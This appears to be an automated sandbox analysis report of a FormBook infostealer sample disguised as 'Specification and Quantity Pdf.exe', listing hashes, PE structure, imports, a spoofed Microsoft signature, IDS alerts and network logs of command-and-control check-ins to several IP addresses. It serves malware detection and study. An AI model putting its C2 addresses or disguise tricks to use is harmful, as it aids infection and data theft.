          Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
          Process:C:\Users\user\Desktop\Specification and Quantity Pdf.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1678432
          Entropy (8bit):7.036542189115781
          Encrypted:false
          SSDEEP:49152:YAodtaG9kS2U84B+FLan9k5TRM9zlxVjZfjQq:I/B13fjQq
          MD5:686FED0AF9EEBB2581701D4E08E9FF0B
          SHA1:3C9F400BA8C6FE7F35F20BCA09E59D3BB8169035
          SHA-256:219A330B7AE9807411D289F28169861FC748F50212AE2317278BFE155D89990F
          SHA-512:178D525F08B12CCCA7C2A11F230E4BD83B74D28D17F15C13696937F57E4272AA34B0542ACA6890E032FF7D4732BE426EF00DCC54ADCEB70BD71F05CBD6D6BB00
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 66%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E..E...D...E...D...E...E...E...DD..EI..D...EI..D...E................PE..d......f.........."....).n..........,..........@....................................x.....`.............................................\...............>............~..`............Z..T....................]..(....Y..@............................................text............................... ..`.managed(z.......|.................. ..`hydrated.................................rdata..jl.......n...r..............@..@.data...............................@....pdata..............................@..@.rsrc...>...........................@..@.reloc...............x..............@..B................................................................................................................................................................
          File type:PE32+ executable (GUI) x86-64, for MS Windows
          Entropy (8bit):7.036542189115781
          TrID:
          • Win64 Executable GUI (202006/5) 77.37%
          • InstallShield setup (43055/19) 16.49%
          • Win64 Executable (generic) (12005/4) 4.60%
          • Generic Win/DOS Executable (2004/3) 0.77%
          • DOS Executable Generic (2002/1) 0.77%
          File name:Specification and Quantity Pdf.exe
          File size:1'678'432 bytes
          MD5:686fed0af9eebb2581701d4e08e9ff0b
          SHA1:3c9f400ba8c6fe7f35f20bca09e59d3bb8169035
          SHA256:219a330b7ae9807411d289f28169861fc748f50212ae2317278bfe155d89990f
          SHA512:178d525f08b12ccca7c2a11f230e4bd83b74d28d17f15c13696937f57e4272aa34b0542aca6890e032ff7d4732be426ef00dcc54adceb70bd71f05cbd6d6bb00
          SSDEEP:49152:YAodtaG9kS2U84B+FLan9k5TRM9zlxVjZfjQq:I/B13fjQq
          TLSH:E675CF15E3A811E8D42BC634CA619633E6B179561B21B4CF0B99E3452F73EE26B7F301
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............
          Icon Hash:3c73b3af8bece413
          Entrypoint:0x14006ac2c
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x140000000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:22a65106d3d84ea74d966fa0424a5a0c
          Signature Valid:false
          Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
          Error Number:-2146762487
          Not Before, Not After
          • 19/09/2024 08:22:43 19/09/2025 08:22:43
          Subject Chain
          • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
          Version:3
          Thumbprint MD5:A467469A816221D8A64572479156FF8A
          Thumbprint SHA-1:8F7AFC79668EE61CCA9DEB12DB3B7FE0B2F61BAA
          Thumbprint SHA-256:0F0691436E3DE9E079C7ADCF4D6FA538217AB742E144127111A535CEAE48BB42
          Serial:1CCEA94EBBFBF04721E7CDBA6E184DD9
          Instruction
          dec eax
          sub esp, 28h
          call 00007F3D38DC206Ch
          dec eax
          add esp, 28h
          jmp 00007F3D38DC1897h
          int3
          int3
          jmp 00007F3D38DC23E8h
          int3
          int3
          int3
          dec eax
          sub esp, 28h
          call 00007F3D38DC23E4h
          jmp 00007F3D38DC1A24h
          xor eax, eax
          dec eax
          add esp, 28h
          ret
          int3
          int3
          jmp 00007F3D38DC1A0Ch
          int3
          int3
          int3
          dec eax
          sub esp, 28h
          dec ebp
          mov eax, dword ptr [ecx+38h]
          dec eax
          mov ecx, edx
          dec ecx
          mov edx, ecx
          call 00007F3D38DC1A32h
          mov eax, 00000001h
          dec eax
          add esp, 28h
          ret
          int3
          int3
          int3
          inc eax
          push ebx
          inc ebp
          mov ebx, dword ptr [eax]
          dec eax
          mov ebx, edx
          inc ecx
          and ebx, FFFFFFF8h
          dec esp
          mov ecx, ecx
          inc ecx
          test byte ptr [eax], 00000004h
          dec esp
          mov edx, ecx
          je 00007F3D38DC1A35h
          inc ecx
          mov eax, dword ptr [eax+08h]
          dec ebp
          arpl word ptr [eax+04h], dx
          neg eax
          dec esp
          add edx, ecx
          dec eax
          arpl ax, cx
          dec esp
          and edx, ecx
          dec ecx
          arpl bx, ax
          dec edx
          mov edx, dword ptr [eax+edx]
          dec eax
          mov eax, dword ptr [ebx+10h]
          mov ecx, dword ptr [eax+08h]
          dec eax
          mov eax, dword ptr [ebx+08h]
          test byte ptr [ecx+eax+03h], 0000000Fh
          je 00007F3D38DC1A2Dh
          movzx eax, byte ptr [ecx+eax+03h]
          and eax, FFFFFFF0h
          dec esp
          add ecx, eax
          dec esp
          xor ecx, edx
          dec ecx
          mov ecx, ecx
          pop ebx
          jmp 00007F3D38DC1A36h
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          nop word ptr [eax+eax+00000000h]
          dec eax
          cmp ecx, dword ptr [00000049h]
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x17f3c00x5c.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x17f41c0xf0.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x19c0000x3b03e.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x18f0000xcdec.pdata
          IMAGE_DIRECTORY_ENTRY_SECURITY0x197e000x1e60.pdata
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d80000x5b8.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x165ae00x54.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x165d000x28.rdata
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1659a00x140.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x11a0000x6a0.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x6f1880x6f20016824105689e93571b28f6d652acf3f1False0.45466728768278963data6.6338226603175485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .managed0x710000x77a280x77c00459fe8e4d0429964edfb07e39e66b232False0.46850331093423797data6.473781869755907IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          hydrated0xe90000x304980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rdata0x11a0000x66c6a0x66e0030e6b6bb7e33da15f5f4a60447b3313aFalse0.48810088851761846data6.702682768000056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x1810000xd5a80x18009d5075bd44b367f703d8e922b003398aFalse0.2294921875data3.190641782829915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .pdata0x18f0000xcdec0xce00638451eb673a6cdf25f666b19f1b8bb4False0.49419751213592233data6.064103613023274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x19c0000x3b03e0x3b2001a4c17201a89cfbf512530447d107f42False0.8662625528541226data7.653977979726921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x1d80000x5b80x600adcf9b9e4d3994d1018ad464f4f1db74False0.5826822916666666data5.215191968056739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          BINARY0x19c3c40x2e4a4data1.0003480939220692
          RT_ICON0x1ca8680x800Device independent bitmap graphic, 48 x 96 x 4, image size 11520.279296875
          RT_ICON0x1cb0680x400Device independent bitmap graphic, 32 x 64 x 4, image size 5120.318359375
          RT_ICON0x1cb4680x200Device independent bitmap graphic, 16 x 32 x 4, image size 1280.314453125
          RT_ICON0x1cb6680x1000Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.49853515625
          RT_ICON0x1cc6680xa00Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.5859375
          RT_ICON0x1cd0680x800Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.57373046875
          RT_ICON0x1cd8680x600Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.421875
          RT_ICON0x1cde680x4400Device independent bitmap graphic, 64 x 128 x 32, image size 168960.2546530330882353
          RT_ICON0x1d22680x2600Device independent bitmap graphic, 48 x 96 x 32, image size 96000.43246299342105265
          RT_ICON0x1d48680x1200Device independent bitmap graphic, 32 x 64 x 32, image size 42240.4144965277777778
          RT_ICON0x1d5a680xa00Device independent bitmap graphic, 24 x 48 x 32, image size 24000.54609375
          RT_ICON0x1d64680x600Device independent bitmap graphic, 16 x 32 x 32, image size 10880.4654947916666667
          RT_GROUP_ICON0x1d6a680xaedata0.5459770114942529
          RT_VERSION0x1d6b180x33cdata0.3780193236714976
          RT_MANIFEST0x1d6e540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
          DLLImport
          ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
          bcrypt.dllBCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
          KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
          ole32.dllCoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
          api-ms-win-crt-heap-l1-1-0.dllmalloc, free, _callnewh, calloc, _set_new_mode
          api-ms-win-crt-math-l1-1-0.dll__setusermatherr
          api-ms-win-crt-string-l1-1-0.dllstrcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
          api-ms-win-crt-convert-l1-1-0.dllstrtoull
          api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
          api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-09-22T17:27:13.393340+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971323.227.38.7480TCP
          2024-09-22T17:27:13.393340+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971323.227.38.7480TCP
          2024-09-22T17:27:13.393340+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971323.227.38.7480TCP
          2024-09-22T17:27:13.456161+02002829004ETPRO MALWARE FormBook CnC Checkin (POST)1192.168.2.74971423.227.38.7480TCP
          2024-09-22T17:28:14.376902+02002829004ETPRO MALWARE FormBook CnC Checkin (POST)1192.168.2.749715203.161.60.19180TCP
          2024-09-22T17:29:39.690092+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971678.46.88.14080TCP
          2024-09-22T17:29:39.690092+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971678.46.88.14080TCP
          2024-09-22T17:29:39.690092+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74971678.46.88.14080TCP
          2024-09-22T17:29:41.658867+02002829004ETPRO MALWARE FormBook CnC Checkin (POST)1192.168.2.74971778.46.88.14080TCP
          TimestampSource PortDest PortSource IPDest IP
          Sep 22, 2024 17:27:12.210124969 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:12.236356974 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:12.236434937 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:12.236576080 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:12.261719942 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:12.739582062 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:12.740617037 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.192573071 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.393188000 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.393207073 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.393219948 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.393285990 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.393340111 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.397914886 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397929907 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397941113 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397950888 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397960901 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397969961 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397979021 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.397981882 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.397985935 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.397994995 CEST804971323.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.398022890 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.398035049 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.398056984 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.398056984 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.398099899 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.398117065 CEST4971380192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.399496078 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.405731916 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.405793905 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.407049894 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.407059908 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.407069921 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.407078981 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.407118082 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.407138109 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.409488916 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.409501076 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.409511089 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.409543991 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.409547091 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.409567118 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.409589052 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.409799099 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.409862041 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.410933971 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.411035061 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.411086082 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.411943913 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.412064075 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.412085056 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.412096024 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.412142038 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.412163019 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.455979109 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.456161022 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.501822948 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.501899004 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.551469088 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.551543951 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.628691912 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.628772020 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.718204021 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.718302965 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.783868074 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.783988953 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.823895931 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.824084044 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:27:13.837012053 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.837027073 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.838604927 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.838614941 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.838624001 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841267109 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841278076 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841285944 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841296911 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841305017 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.841314077 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.842860937 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.842875957 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.843648911 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.845426083 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.845556974 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.845567942 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.849081993 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.851326942 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.852125883 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.852138042 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.853468895 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.853480101 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.853491068 CEST804971423.227.38.74192.168.2.7
          Sep 22, 2024 17:27:13.853548050 CEST4971480192.168.2.723.227.38.74
          Sep 22, 2024 17:28:14.309647083 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.316273928 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.318166018 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.318166018 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.323261023 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323292017 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323318958 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323345900 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323421955 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323448896 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323496103 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323522091 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323548079 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.323553085 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.323587894 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.324882984 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.327990055 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328531027 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328577995 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328603983 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328629971 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328644991 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.328655958 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328686953 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.328722954 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.332803011 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.369765997 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.376902103 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.425962925 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.429254055 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.477927923 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.484829903 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.533935070 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.540827990 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.589797974 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.589934111 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.637811899 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.644805908 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.693823099 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.693972111 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.742054939 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.742443085 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.748225927 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.748765945 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.753777027 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753808975 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753859997 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753886938 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753914118 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753941059 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753968000 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.753994942 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754045010 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754070997 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754117012 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754143953 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754169941 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754200935 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754314899 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754357100 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754426956 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754457951 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754503012 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.754529953 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.833868980 CEST4971580192.168.2.7203.161.60.191
          Sep 22, 2024 17:28:14.839440107 CEST8049715203.161.60.191192.168.2.7
          Sep 22, 2024 17:28:14.841109037 CEST4971580192.168.2.7203.161.60.191
          TimestampSource PortDest PortSource IPDest IP
